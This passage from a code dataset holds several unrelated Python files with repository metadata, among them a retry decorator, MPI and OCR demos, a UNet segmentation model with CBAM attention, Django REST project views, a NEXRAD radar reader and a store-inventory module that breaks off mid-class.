# def put_data(pipeline=None, *arguments, **parameters):\n#     def decorator(func):\n#         @functools.wraps(func)\n#         def wrapper(*args, **kwargs):\n#             try:\n#                 result = func(*args, **kwargs)\n#                 if isinstance(result, BaseItem):\n#                     pp = pipeline(*arguments, **parameters)\n#                     pp.before_process()\n#                     pp.process(item=result)\n#                     pp.after_process()\n#                 elif isinstance(result, list) or isinstance(result, GeneratorType):\n#                     pp = pipeline(*arguments, **parameters)\n#                     pp.before_process()\n#                     for item in result:\n#                         pp.process(item=item)\n#                     pp.after_process()\n#                 else:\n#                     logger.info('func>>>%s ' % str(func))\n#             except Exception as e:\n#                 logger.error(e)\n#         return wrapper\n#     return decorator\n\n\ndef _get_last_backslash(strings, regex=re.compile(r\"\\\\*$\")):\n    mth = regex.search(strings)\n    if mth:\n        return mth.group()\n    return \"\"\n\n\ndef replace_quote(json_str):\n    \"\"\"\n    Convert the single quotes in a string that is about to be json.loads-ed into\n    double quotes. If a single quote is part of the element body itself, rather\n    than a string delimiter, it is left untouched.\n    :param json_str:\n    :return:\n    \"\"\"\n    if not isinstance(json_str, str):\n        return json_str\n\n    double_quote = []\n    new_lst = []\n    for index, val in enumerate(json_str):\n        if val == '\"' and not len(_get_last_backslash(json_str[:index])) % 2:\n            if double_quote:\n                double_quote.pop(0)\n            else:\n                double_quote.append(val)\n        if val == \"'\" and not len(_get_last_backslash(json_str[:index])) % 2:\n            if not double_quote:\n                val = '\"'\n        new_lst.append(val)\n    return \"\".join(new_lst)\n\n\ndef safely_json_loads(json_str, defaulttype=dict, escape=True):\n    \"\"\"\n    Return a safely loaded JSON object.\n    :param json_str: the string to be loaded\n    :param defaulttype: the object type to fall back to when loading fails\n    :param escape: whether to convert single quotes into double quotes\n    :return:\n    \"\"\"\n    if not json_str:\n        return defaulttype()\n    elif escape:\n        data = replace_quote(json_str)\n        return json.loads(data)\n    else:\n        return json.loads(json_str)\n\n\ndef retry_wrapper(\n        retry_times, exception=Exception, error_handler=None, interval=0.1):\n    \"\"\"\n    Function retry decorator.\n    :param retry_times: number of retries\n    :param exception: the exception type that triggers a retry\n    :param error_handler: callback invoked when an error occurs\n    :param interval: sleep interval between retries\n    :return:\n    \"\"\"\n    def out_wrapper(func):\n        @functools.wraps(func)\n        def wrapper(*args, **kwargs):\n            count = 0\n            while True:\n                try:\n                    return func(*args, **kwargs)\n                except exception as e:\n                    count += 1\n                    if error_handler:\n                        result = error_handler(\n                            func.__name__, count, e, *args, **kwargs)\n                        if result:\n                            count -= 1\n                    if count >= retry_times:\n                        raise\n                    time.sleep(interval)\n        return wrapper\n    return out_wrapper","repo_name":"HyokaChen/DailyNewsSpider","sub_path":"utils/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"33256207762","text":"from mpi4py import MPI\nimport numpy as np\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\nSIZE=12\n\nif rank == 0:\n    np.random.seed(42)\n    tab = np.random.randint(100, size = SIZE, dtype='i')\nelse:\n    tab = None\n\nlocal_tab = np.zeros(4, dtype='i')\ncomm.Scatter(tab, local_tab, root=0)\n\nc_max = np.zeros(1, dtype='i')\nc_pos = np.zeros(1, dtype='i')\nc_max[0] = np.max(local_tab)\nc_pos[0] = np.argmax(local_tab) + rank * 4\nprint(\"Rank: \", rank, \" max: \", c_max, \" pos: \", c_pos)\n\nmax_pos = np.zeros(size, dtype='i')\nmax_val = np.zeros(size, dtype='i')\n\ncomm.Gather(c_max, max_val, root=0)\ncomm.Gather(c_pos, max_pos, root=0)\n\nif rank == 0:\n    pos = np.argmax(max_val)\n    print(\"Max pos: \", max_pos[pos])\n    print(\"Max val: \", max_val)\n","repo_name":"jturner116/M1","sub_path":"mpi/TPcodes/mpi_max_pos.py","file_name":"mpi_max_pos.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
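mpi_max_pos above finds a global argmax in two stages: each rank reports its local maximum plus the local argmax offset by rank * chunk_size, and rank 0 reduces over those reports. The combine step can be verified without MPI; a numpy-only sketch with the same seed and a fixed 3-rank split (the split is an assumption for illustration):

import numpy as np

np.random.seed(42)
tab = np.random.randint(100, size=12)
chunks = tab.reshape(3, 4)                              # what Scatter hands to 3 ranks
local_max = chunks.max(axis=1)                          # each rank's c_max
local_pos = chunks.argmax(axis=1) + np.arange(3) * 4    # each rank's c_pos
winner = np.argmax(local_max)                           # rank 0's final reduction
assert tab[local_pos[winner]] == tab.max()
print(local_pos[winner], tab.max())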
+{"seq_id":"28348313462","text":"# coding:utf-8\n\n'''\nMarch 2019 by Chen Jun\nhttps://github.com/chenjun2hao/Attention_ocr.pytorch\n\n'''\n\nimport torch\nfrom torch.autograd import Variable\nimport utils\nimport dataset\nfrom PIL import Image\nfrom utils import alphabet\nimport models.crnn_lang as crnn\n\nuse_gpu = True\n\nencoder_path = './expr/attentioncnn/encoder_5.pth'\ndecoder_path = './expr/attentioncnn/decoder_5.pth'\nimg_path = './test_img/20441531_4212871437.jpg'\nmax_length = 15          # maximum length of the output string\nEOS_TOKEN = 1\n\nnclass = len(alphabet) + 3\nencoder = crnn.CNN(32, 1, 256)          # encoder\n# decoder = crnn.decoder(256, nclass)     # seq-to-seq decoder; the decoder adds 2 more classes on top of nclass\ndecoder = crnn.decoderV2(256, nclass)\n\n\nif encoder_path and decoder_path:\n    print('loading pretrained models ......')\n    encoder.load_state_dict(torch.load(encoder_path))\n    decoder.load_state_dict(torch.load(decoder_path))\nif torch.cuda.is_available() and use_gpu:\n    encoder = encoder.cuda()\n    decoder = decoder.cuda()\n\n\nconverter = utils.strLabelConverterForAttention(alphabet)\n\ntransformer = dataset.resizeNormalize((280, 32))\nimage = Image.open(img_path).convert('L')\nimage = transformer(image)\nif torch.cuda.is_available() and use_gpu:\n    image = image.cuda()\nimage = image.view(1, *image.size())\nimage = Variable(image)\n\nencoder.eval()\ndecoder.eval()\nencoder_out = encoder(image)\n\ndecoded_words = []\nprob = 1.0\ndecoder_attentions = torch.zeros(max_length, 71)\ndecoder_input = torch.zeros(1).long()       # initialize the decoder start symbol; decoding begins from token 0\ndecoder_hidden = decoder.initHidden(1)\nif torch.cuda.is_available() and use_gpu:\n    decoder_input = decoder_input.cuda()\n    decoder_hidden = decoder_hidden.cuda()\nloss = 0.0\n# at inference time, use the non-teacher-forcing strategy: feed the previous output back in as the next input, until the label is EOS_TOKEN\nfor di in range(max_length):  # maximum length of the string\n    decoder_output, decoder_hidden, decoder_attention = decoder(\n        decoder_input, decoder_hidden, encoder_out)\n    probs = torch.exp(decoder_output)\n    decoder_attentions[di] = decoder_attention.data\n    topv, topi = decoder_output.data.topk(1)\n    ni = topi.squeeze(1)\n    decoder_input = ni\n    prob *= probs[:, ni]\n    if ni == EOS_TOKEN:\n        # decoded_words.append('')\n        break\n    else:\n        decoded_words.append(converter.decode(ni))\n\nwords = ''.join(decoded_words)\nprob = prob.item()\nprint('predict_str:%-20s => prob:%-20s' % (words, prob))\n","repo_name":"chenjun2hao/Attention_ocr.pytorch","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"53"} +{"seq_id":"42725699028","text":"import cv2\nimport pytest\n\nfrom demo.images import create_sample_image\nfrom ocr.tesseract import Tesseract, Word\nfrom ocr.types import Image\n\n\n@pytest.fixture\ndef image() -> Image:\n    _name, image = create_sample_image()\n    return image\n\n\n@pytest.fixture\ndef extractor():\n    return Tesseract()\n\n\ndef test_detect(image, extractor):\n    assert isinstance(image, Image)\n    assert hasattr(extractor, \"detect\")\n\n    data = extractor.detect(image, lang=\"ita\")\n    assert isinstance(data, list)\n    assert isinstance(data[0], Word)\n","repo_name":"archiviofontiorali/afor-ocr","sub_path":"tests/test_detection.py","file_name":"test_detection.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
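test_detect above leans on pytest's fixture injection: the image and extractor arguments are resolved by name from the @pytest.fixture functions. The same wiring in a dependency-free sketch:

import pytest

@pytest.fixture
def numbers():
    # pytest calls this and passes the return value to any test that names it.
    return [3, 1, 2]

def test_sorted_copy(numbers):
    assert sorted(numbers) == [1, 2, 3]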
+{"seq_id":"21932380967","text":"# Write a program that computes the sum of 5 numbers entered by the user.\n\nprint('Welcome to the five-number sum calculator!')\n\ncontador = 1\nsoma_total = 0\n\nwhile contador <= 5:\n    numero = int(input(f'Enter a number ({contador}/5): '))\n    soma_total += numero\n    contador += 1\n\nprint(f'\\nSum of the five numbers: {soma_total}')\n","repo_name":"mateusadada/python-IPO-UDESC","sub_path":"Exercícios resolvidos/exercise_022.py","file_name":"exercise_022.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13064658887","text":"import argparse\nimport json\n\nfrom anytree.exporter import UniqueDotExporter\nfrom anytree.importer import DictImporter\n\nimporter = DictImporter()\n\n\ndef remove_dots(obj):\n    for key in obj.keys():\n        new_key = key.replace(\"node_type\", \"name\")\n        if new_key != key:\n            if obj['value'].strip() in ['{', '}', '']:\n                obj[new_key] = \"Node_type: \" + obj[key] + \"\\n\" + \"Line: \" + str(\n                    obj['line'])\n            else:\n                obj[new_key] = \"Node_type: \" + obj[key] + \"\\n\" + \"Value: \" + obj['value'] + \"\\n\" + \"Line: \" + str(\n                    obj['line'])\n            del obj[key]\n    return obj\n\n\nif __name__ == '__main__':\n    arg_parser = argparse.ArgumentParser(description='Tree Generator!')\n    arg_parser.add_argument(\"--i\", default=\"AST.json\", type=str, help=\"Input JSON file with Nodes\")\n    arg_parser.add_argument(\"--o\", default=\"tree.png\", type=str, help=\"Output image for tree \")\n    args: argparse.Namespace = arg_parser.parse_args()\n    input_filename: str = args.i\n    output_filename: str = args.o\n\n    with open(input_filename) as json_file:\n        data = json.load(json_file)\n\n    new_json = json.loads(json.dumps(data), object_hook=remove_dots)\n\n    root = importer.import_(new_json)\n\n    UniqueDotExporter(root).to_picture(output_filename)\n","repo_name":"exomatt/aitsi","sub_path":"main_tree-gen.py","file_name":"main_tree-gen.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4628845724","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndane = pd.read_csv('wine_results.csv',sep=';',encoding='cp1250',na_values=None)\npd.set_option('display.width', 400)\nprint(dane)\n\n# CORRELATION\ncorr = dane.corr()\nprint(corr)\n# Plot it\nmask = np.zeros_like(corr)\nmask[np.triu_indices_from(mask)] = True\nsns.heatmap(corr, mask=mask) # makes the heatmap show only one triangle\nplt.xticks(rotation=40)\nplt.yticks(rotation=40)\nplt.tight_layout()\nplt.title('Correlation',y=0.98)\nplt.show()","repo_name":"theSaint92/5_sztuczna_inteligencja_i_systemy_ekspertowe","sub_path":"knn/korelacja/korelacja.py","file_name":"korelacja.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32510480525","text":"from tensorflow.keras import models, layers\nfrom tensorflow.keras import regularizers\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef UNet(input_shape,input_label_channel, layer_count=64, regularizers = regularizers.l2(0.0001), gaussian_noise=0.1, 
weight_file = None):\n \"\"\" Method to declare the UNet model.\n\n Args:\n input_shape: tuple(int, int, int, int)\n Shape of the input in the format (batch, height, width, channels).\n input_label_channel: list([int])\n list of index of label channels, used for calculating the number of channels in model output.\n layer_count: (int, optional)\n Count of kernels in first layer. Number of kernels in other layers grows with a fixed factor.\n regularizers: keras.regularizers\n regularizers to use in each layer.\n weight_file: str\n path to the weight file.\n \"\"\"\n\n input_img = layers.Input(input_shape[1:], name='Input')\n pp_in_layer = input_img\n# pp_in_layer = layers.GaussianNoise(gaussian_noise)(input_img)\n# pp_in_layer = layers.BatchNormalization()(pp_in_layer)\n\n\n c1 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(pp_in_layer)\n c1 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(c1)\n n1 = layers.BatchNormalization()(c1)\n p1 = layers.MaxPooling2D((2, 2))(n1)\n p1 = CBAM_attention(p1) + p1\n\n c2 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(p1)\n c2 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(c2)\n n2 = layers.BatchNormalization()(c2)\n p2 = layers.MaxPooling2D((2, 2))(n2)\n p2 = CBAM_attention(p2) + p2\n\n c3 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(p2)\n c3 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(c3)\n n3 = layers.BatchNormalization()(c3)\n p3 = layers.MaxPooling2D((2, 2))(n3)\n p3 = CBAM_attention(p3) + p3\n\n c4 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(p3)\n c4 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(c4)\n n4 = layers.BatchNormalization()(c4)\n p4 = layers.MaxPooling2D(pool_size=(2, 2))(n4)\n p4 = CBAM_attention(p4) + p4\n\n c5 = layers.Conv2D(16*layer_count, (3, 3), activation='relu', padding='same')(p4)\n c5 = layers.Conv2D(16*layer_count, (3, 3), activation='relu', padding='same')(c5)\n\n u6 = layers.UpSampling2D((2, 2))(c5)\n n6 = layers.BatchNormalization()(u6)\n u6 = layers.concatenate([n6, n4])\n c6 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(u6)\n c6 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(c6)\n\n u7 = layers.UpSampling2D((2, 2))(c6)\n n7 = layers.BatchNormalization()(u7)\n u7 = layers.concatenate([n7, n3])\n c7 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(u7)\n c7 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(c7)\n\n u8 = layers.UpSampling2D((2, 2))(c7)\n n8 = layers.BatchNormalization()(u8)\n u8 = layers.concatenate([n8, n2])\n c8 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(u8)\n c8 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(c8)\n\n u9 = layers.UpSampling2D((2, 2))(c8)\n n9 = layers.BatchNormalization()(u9)\n u9 = layers.concatenate([n9, n1])\n c9 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(u9)\n c9 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(c9)\n c9 = layers.Dropout(.2)(c9)#, training=True)\n \n d = layers.Conv2D(len(input_label_channel), (1, 1), activation='sigmoid', kernel_regularizer= regularizers)(c9)\n\n seg_model = models.Model(inputs=[input_img], outputs=[d])\n if weight_file:\n seg_model.load_weights(weight_file)\n seg_model.summary()\n return seg_model\n\n# (1) Channel 
Attention\ndef channel_attention(inputs, ratio=0.25):\n    '''ratio represents the multiplier for reducing the number of channels in the first fully connected layer'''\n\n    channel = inputs.shape[-1] # Get the number of channels in the input feature map\n\n    # Apply global max-pooling and global average-pooling to the output feature map separately\n    # [h,w,c] => [None,c]\n    x_max = layers.GlobalMaxPooling2D()(inputs)\n    x_avg = layers.GlobalAveragePooling2D()(inputs)\n\n    # [None,c] => [1,1,c]\n    x_max = layers.Reshape([1,1,-1])(x_max) # -1 automatically finds the channel dimension size\n    x_avg = layers.Reshape([1,1,-1])(x_avg) # Alternatively, you can use the variable 'channel' instead of -1\n\n    # Reduce the number of channels by 1/4 in the first fully connected layer, [1,1,c] => [1,1,c//4]\n    # (cast to int, since Dense units must be an integer)\n    x_max = layers.Dense(int(channel*ratio))(x_max)\n    x_avg = layers.Dense(int(channel*ratio))(x_avg)\n\n    # Apply ReLU activation\n    x_max = layers.Activation('relu')(x_max)\n    x_avg = layers.Activation('relu')(x_avg)\n\n    # Increase the number of channels in the second fully connected layer, [1,1,c//4] => [1,1,c]\n    x_max = layers.Dense(channel)(x_max)\n    x_avg = layers.Dense(channel)(x_avg)\n\n    # Sum the results, [1,1,c] + [1,1,c] => [1,1,c]\n    x = layers.Add()([x_max, x_avg])\n\n    # Normalize the weights using sigmoid\n    x = tf.nn.sigmoid(x)\n\n    # Multiply the input feature map by the weight vector to assign weights to each channel\n    x = layers.Multiply()([inputs, x]) # [h,w,c] * [1,1,c] => [h,w,c]\n\n    return x\n\n# (2) Spatial Attention\ndef spatial_attention(inputs):\n\n    # Perform max-pooling and average-pooling over the channel dimension [b,h,w,c] => [b,h,w,1]\n    # Set keepdims=False to get [b,h,w,c] => [b,h,w]\n    x_max = tf.reduce_max(inputs, axis=3, keepdims=True) # Compute the maximum value over the channel dimension\n    x_avg = tf.reduce_mean(inputs, axis=3, keepdims=True) # 'axis' can also be -1\n\n    # Stack the results over the channel dimension [b,h,w,2]\n    x = layers.concatenate([x_max, x_avg])\n\n    # Adjust the channels using a 1*1 convolution [b,h,w,1]\n    x = layers.Conv2D(filters=1, kernel_size=(1,1), strides=1, padding='same')(x)\n\n    # Normalize the weights using the sigmoid function\n    x = tf.nn.sigmoid(x)\n\n    # Multiply the input feature map by the weight vector\n    x = layers.Multiply()([inputs, x])\n\n    return x\n\n# (3) CBAM Attention\ndef CBAM_attention(inputs):\n\n    # Apply channel attention first and then spatial attention\n    x = channel_attention(inputs)\n    x = spatial_attention(x)\n    return x","repo_name":"arthurweijiawei/ACM_SIGSPATIAL_Cup2023","sub_path":"MainProject/core/UNetAttention.py","file_name":"UNetAttention.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
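A quick property one can check against attention blocks like those in the UNetAttention record above: channel and spatial attention only rescale activations, so the output shape must equal the input shape. A minimal tf.keras sketch of the channel branch (a standalone re-implementation for illustration, not the record's exact code):

import tensorflow as tf
from tensorflow.keras import layers

def tiny_channel_attention(x, ratio=0.25):
    c = x.shape[-1]
    w = layers.GlobalAveragePooling2D()(x)        # [b,h,w,c] -> [b,c]
    w = layers.Reshape([1, 1, c])(w)
    w = layers.Dense(int(c * ratio), activation='relu')(w)
    w = layers.Dense(c, activation='sigmoid')(w)  # per-channel weights in (0,1)
    return layers.Multiply()([x, w])              # broadcast back over h and w

inp = layers.Input((32, 32, 8))
out = tiny_channel_attention(inp)
assert out.shape[1:] == inp.shape[1:]             # attention preserves shape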
+{"seq_id":"8021678227","text":"import logging\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import ProjectSerializer, ProjectRequestSerializer\n\nfrom .models import Projects\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_all_projects(request):\n    logging.info(\"######## Getting All Projects\")\n    projects = Projects.objects.filter(user=request.user)\n    serializer = ProjectSerializer(projects, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_project(request, pk):\n    logging.info(f\"######## Getting Project by id {pk}\")\n\n    try:\n        project = Projects.objects.get(pk=pk, user=request.user)\n    except Projects.DoesNotExist:\n        return Response(status=status.HTTP_404_NOT_FOUND)\n\n    serializer = ProjectSerializer(project)\n    return Response(serializer.data)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef create_project(request):\n    logging.info(f\"######## Creating Project: {request}\")\n\n    serializer = ProjectRequestSerializer(data=request.data)\n    if serializer.is_valid():\n        serializer.save(user=request.user)\n        return Response(serializer.data, status=status.HTTP_201_CREATED)\n    return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef update_project(request, pk):\n    logging.info(f\"######## Updating Project: {request} ---- {pk}\")\n\n    try:\n        project = Projects.objects.get(pk=pk, user=request.user)\n    except Projects.DoesNotExist:\n        return Response(status=status.HTTP_404_NOT_FOUND)\n\n    serializer = ProjectRequestSerializer(project, data=request.data)\n    if serializer.is_valid():\n        serializer.save()\n        return Response(serializer.data)\n    return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_project(request, pk):\n    logging.info(f\"######## Deleting Project: {request} ---- {pk}\")\n    try:\n        project = Projects.objects.get(pk=pk, user=request.user)\n    except Projects.DoesNotExist:\n        return Response(status=status.HTTP_404_NOT_FOUND)\n\n    project.delete()\n    return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"koushindrak/task_manager_backend_django","sub_path":"ProjectApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37722936626","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 5 16:17:40 2019\r\n@author: Robinson Wallace\r\n\r\nPurpose: To reorder nexrad data so that each scan has its 0 azimuth degree \r\n         located in the 0th index for each radar elevation scan. PyArt does\r\n         this behind the scenes, but we do this here for simplicity of analysis\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport pyart\r\nimport numpy as np\r\n\r\n\r\ndef read_format_nexrad_lvl2(data_path):\r\n\r\n    radexit = 0\r\n    while True:\r\n        \r\n        # Make a reflectivity volume\r\n        try:\r\n            radar = pyart.io.read(data_path)\r\n            radexit = 0\r\n        except:\r\n            # Sometimes there is an error in reading the radar file\r\n            print('Something went wrong, retrying...')\r\n            radexit = 1\r\n        \r\n        if radexit == 1:\r\n            print('Unable to load in NEXRAD file.')\r\n            break\r\n        \r\n        rad_lat = radar.latitude['data'][0]\r\n        rad_lon = radar.longitude['data'][0]\r\n        radhght = radar.altitude['data'][0]\r\n        \r\n        sweep_start_inds = radar.sweep_start_ray_index['data']\r\n        sweep_end_inds = radar.sweep_end_ray_index['data']\r\n        n_azm = 360 #radar.nrays\r\n        n_rng = radar.ngates\r\n        n_elv = radar.nsweeps\r\n        r_elv = np.zeros((n_elv))\r\n        ref_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n        zdr_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n        rhv_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n        vel_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n        \r\n        \"\"\"\r\n        The data comes as a long stream of data, not broken up into sweeps, so we\r\n        have to do that. Some scans are 720 degrees while others are 360. We'll just\r\n        drop the in-between data for the 720 degree measurements. 
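The reordering the comment block above describes is one np.roll per sweep: find the ray whose azimuth reads below 1 degree and rotate the sweep array so that ray lands in row 0. A toy sketch with 4 rays instead of 360 (values are illustrative only):

import numpy as np

azimuths = np.array([270.5, 0.3, 90.1, 180.2])   # rays in scan order
sweep = np.arange(8).reshape(4, 2)               # one row of gate values per ray
north = np.where(azimuths < 1)[0]                # same test the record uses
rolled = np.roll(sweep, -north[0], axis=0)       # the near-0-degree ray is now row 0
print(rolled[0])                                 # data from the 0.3-degree ray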
In the process, shift\r\n the azimuth scan so that north is at the first index\r\n \"\"\"\r\n \r\n for e in range(0,n_elv):\r\n \r\n # For the sweeps of 720 azimuths\r\n if sweep_end_inds[e]-sweep_start_inds[e] == 719:\r\n f_azm = np.where(radar.azimuth['data'][sweep_start_inds[e]:sweep_end_inds[e]:2]<1)[0]\r\n # If the radar doesn't do a complete scan, the azimuths may not start at zero\r\n if len(f_azm) == 0:\r\n continue\r\n ref = radar.fields['reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n ref_sft = np.roll(ref,-f_azm[0],0)\r\n ref_vol[:,:,e] = ref_sft\r\n \r\n zdr = radar.fields['differential_reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n zdr_sft = np.roll(zdr,-f_azm[0],0)\r\n zdr_vol[:,:,e] = zdr_sft\r\n \r\n rhv = radar.fields['cross_correlation_ratio']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n rhv_sft = np.roll(rhv,-f_azm[0],0)\r\n rhv_vol[:,:,e] = rhv_sft\r\n \r\n vel = radar.fields['velocity']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n vel_sft = np.roll(vel,-f_azm[0],0)\r\n vel_vol[:,:,e] = vel_sft\r\n \r\n r_elv[e] = radar.elevation['data'][sweep_start_inds[e]]\r\n \r\n if sweep_end_inds[e]-sweep_start_inds[e] == 359:\r\n f_azm = np.where(radar.azimuth['data'][sweep_start_inds[e]:sweep_end_inds[e]+1]<1)[0]\r\n if len(f_azm) == 0:\r\n continue\r\n \r\n ref = radar.fields['reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n ref_sft = np.roll(ref,-f_azm[0],0)\r\n ref_vol[:,:,e] = ref_sft\r\n \r\n zdr = radar.fields['differential_reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n zdr_sft = np.roll(zdr,-f_azm[0],0)\r\n zdr_vol[:,:,e] = zdr_sft\r\n \r\n rhv = radar.fields['cross_correlation_ratio']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n rhv_sft = np.roll(rhv,-f_azm[0],0)\r\n rhv_vol[:,:,e] = rhv_sft\r\n \r\n vel = radar.fields['velocity']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n vel_sft = np.roll(vel,-f_azm[0],0)\r\n vel_vol[:,:,e] = vel_sft\r\n \r\n r_elv[e] = radar.elevation['data'][sweep_start_inds[e]]\r\n \r\n r_gate = radar.range['data']\r\n \r\n # Sometimes PyART doesn't decode the data correctly, so we can try it until it does\r\n # This has been coded to evacuate the loop if the data just truely sucks\r\n if len(r_elv) > 2:\r\n break\r\n else:\r\n print(\"Bad computation of elevation scans. 
Retrying...\")\r\n radexit += 1\r\n if radexit == 2:\r\n break\r\n \r\n if radexit == 2:\r\n print(\"WARNING: Radar Data is erroneous (Bad elevation scans)\")\r\n \r\n \r\n radar_time = radar.time['units'][14:]\r\n year = radar_time.split('-')[0]\r\n month = radar_time.split('-')[1]\r\n day = radar_time.split('-')[2][0:2]\r\n hour = radar_time.split('-')[2].split(':')[0][3:5]\r\n minute = radar_time.split('-')[2].split(':')[1]\r\n second = radar_time.split('-')[2].split(':')[2]\r\n \r\n if radexit >= 1: return None\r\n \r\n return {\"ref\":ref_vol,\"zdr\":zdr_vol,\"rhv\":rhv_vol,\"velocity\":vel_vol,\r\n \"azim\":np.arange(0,360),\"gate\":r_gate,\"elv\":r_elv,\r\n \"year\":year,\"month\":month,\"day\":day,\"hour\":hour,\"minute\":minute,\r\n \"second\":second,\"radar_altitude\":radhght,\"radar_latitude\":rad_lat,\r\n \"radar_longitude\":rad_lon}\r\n \r\nif __name__ == '__main__':\r\n \r\n # Input a filepath to a nexrad data file\r\n vol = read_format_nexrad_lvl2('')\r\n","repo_name":"RWallace2357/radar_surface_gauge_validation","sub_path":"read_format_nexrad.py","file_name":"read_format_nexrad.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1321966849","text":"from typing import Dict\nfrom type_definitions import CustomerInfoType, ItemInfoType\nfrom utils import (\n handle_operation_errors,\n is_valid_category,\n is_valid_customer,\n is_valid_item_info,\n)\n\n\nclass Store:\n \"\"\"\n Represents a store that manages categories and items.\n \"\"\"\n\n def __init__(self):\n self.categories: Dict[str, Category] = {}\n self.items: Dict[str, Item] = {}\n\n @handle_operation_errors\n def add_category(self, name: str):\n \"\"\"\n Add a new category to the store.\n \"\"\"\n\n is_valid_category(name)\n\n if name in self.categories:\n raise ValueError(f\"Category {name} already exists!\")\n\n self.categories[name] = Category(name)\n print(f\"\\n\\nCategory {name} added successfully!\\n\\n\")\n\n @handle_operation_errors\n def add_item(self, item_info: ItemInfoType):\n \"\"\"\n Add a new item to the store.\n \"\"\"\n\n is_valid_item_info(item_info)\n\n product_category = item_info.get(\"product_category\")\n category = self.categories.get(product_category)\n\n if category:\n ids = [item.id for item in self.items.values()]\n id = item_info.get(\"id\")\n if id in ids:\n raise ValueError(f\"An Item with id: {id} already exist!\")\n\n item = Item(item_info)\n category.add_item(item)\n self.items[id] = item\n print(f\"\\n\\nItem: {item.name} added successfully!\\n\\n\")\n else:\n raise ValueError(f\"Category: {product_category} does not exist.\")\n\n @handle_operation_errors\n def get_item_by_id(self, item_id: int):\n \"\"\"\n Get an item from the store by its ID.\n \"\"\"\n\n item = self.items.get(item_id)\n if not item:\n raise KeyError(f\"Item with id: {item_id} does not exist!\")\n\n return item\n\n @handle_operation_errors\n def delete_item(self, id: int):\n \"\"\"\n Delete an item from the store by its ID.\n \"\"\"\n\n if id in self.items:\n del self.items[id]\n print(f\"\\n\\nItem with id: {id} removed from store!\\n\\n\")\n else:\n raise KeyError(f\"Item with id: {id} not found!\")\n\n\nclass Category:\n \"\"\"\n Represents a category in the store.\n \"\"\"\n\n def __init__(self, name: str):\n self.name = name\n self.items = {}\n\n def add_item(self, item):\n \"\"\"\n Add an item to the category.\n \"\"\"\n\n self.items[item.id] = item\n\n\nclass Item:\n \"\"\"\n Represents an item in the 
